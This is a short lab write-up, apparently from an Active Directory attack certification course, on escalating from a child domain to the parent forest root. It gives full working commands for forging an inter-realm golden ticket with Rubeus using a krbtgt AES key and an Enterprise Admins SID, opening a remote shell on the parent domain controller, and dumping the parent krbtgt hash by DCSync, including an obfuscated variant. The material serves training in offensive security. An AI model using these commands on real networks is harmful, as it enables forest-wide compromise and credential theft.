CRTP Lab 19
Task
Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using dollarcorp's krbtgt hash.
Since we already have krbtgt hash from dcorp-dc , we can create the inter-realm TGT and inject it.
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args golden /user:Administrator /id:500 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /netbios:dcorp /ptt
We can now access mcorp-dc
winrs -r:mcorp-dc.moneycorp.local cmd
C:\Users\Administrator.dcorp>set username
set username
USERNAME=Administrator
C:\Users\Administrator.dcorp>set computername
set computername
COMPUTERNAME=MCORP-DC
C:\Users\Administrator.dcorp>
To dump krbtgt\mcorp NTLM
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
OR use DCSync to dump secrets
# ArgSplit for "lsadump::dcsync"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
Last updated